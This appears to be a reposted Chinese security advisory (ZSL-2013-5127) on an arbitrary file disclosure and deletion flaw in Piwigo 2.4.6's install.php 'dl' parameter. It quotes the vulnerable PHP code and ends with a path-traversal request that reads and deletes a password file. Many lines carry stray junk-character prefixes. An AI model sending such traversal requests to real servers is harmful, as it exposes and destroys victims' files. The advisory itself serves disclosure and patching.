Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

# j5 G( N4 [3 y2 h6 ^  [4 SPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
0 k6 L% ]9 G, ^& s- B====================================================================
: O/ D: q$ Y' Z: }9 a" H' k# @  X% B/install.php:
-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
. I: z6 |4 g! Y- N114: {
% T5 K* [( f6 A5 {3 i' r: W2 N115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
' w! ]* X4 f3 ^8 C118:   header('Content-Disposition: attachment; filename="database.inc.php"');
9 M: g% h( ?1 V3 |# b! A& h6 z% z119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
* _9 O0 z# P# m9 b122:   unlink($filename);
9 W$ g+ u2 ~) D) q123:   exit();
/ C, Q* w- F7 D) c124: }
====================================================================
, D4 S. I+ y) v3 S% g! [
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

) c$ |/ Z8 R0 r" G+ q1 MVulnerability discovered by Gjoko 'LiquidWorm' Krstic
" R: l4 x, d1 u4 K                            @zeroscience

Advisory ID: ZSL-2013-5127
$ ~! F$ H, u) t5 t4 ^, EAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
2 D' Y4 H, K$ m
- J3 x+ q1 E6 n- E$ ]2 M15.02.2013

3 D/ m  d4 j' _' W4 t--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
& X0 q/ N+ V4 n: w. I
# x* h  `/ B9 _7 v